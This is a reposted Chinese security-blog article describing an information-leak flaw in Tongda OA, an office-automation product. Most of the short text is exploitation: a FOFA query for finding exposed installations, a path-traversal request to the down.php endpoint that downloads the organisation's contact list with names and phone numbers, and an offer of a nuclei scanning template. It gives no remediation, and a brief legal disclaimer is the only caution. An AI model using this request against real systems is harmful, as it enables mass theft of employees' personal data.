CTF导航 CTF导航

通达OA down 信息泄露

渗透技巧 11个月前 admin
119 0 0
通达OA down 信息泄露

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!

00

漏洞概述

通达OA down 信息泄露

通达OA down 接口可下载用户联系人信息。

01

空间搜索语法

通达OA down 信息泄露

fofa

app=”TDXK-通达OA”

通达OA down 信息泄露

02

利用过程

通达OA down 信息泄露

登录界面

通达OA down 信息泄露

down接口可下载用户联系人信息
http://xxxxx/inc/package/down.php?id=../../../cache/org

漏洞存在响应包如下。

通达OA down 信息泄露

泄露用户姓名及手机号信息。

通达OA down 信息泄露

03

nuclei

通达OA down 信息泄露

通达OA down 信息泄露

获取脚本关注本公众号后发送:Tongda1
原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创

关注我们

原文始发于微信公众号(天澜实验室):通达OA down 信息泄露

版权声明:admin 发表于 2023年11月30日 下午9:59。
转载请注明:通达OA down 信息泄露 | CTF导航

相关文章

云原生安全攻防|使用eBPF逃逸容器技术分析与实践
admin
1,032
使用eBPF LSM热修复Linux内核漏洞
admin
931
Java代审5:SQL 注入-Mybatis复现
admin
1,518
Bypass-JSPWebshellV1.1自动生成工具已发布
admin
648
记一次对VAuditDemo的白盒审计
admin
43
攻击技术研判|Roshtyak中使用的内存防御规避策略
admin
543

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0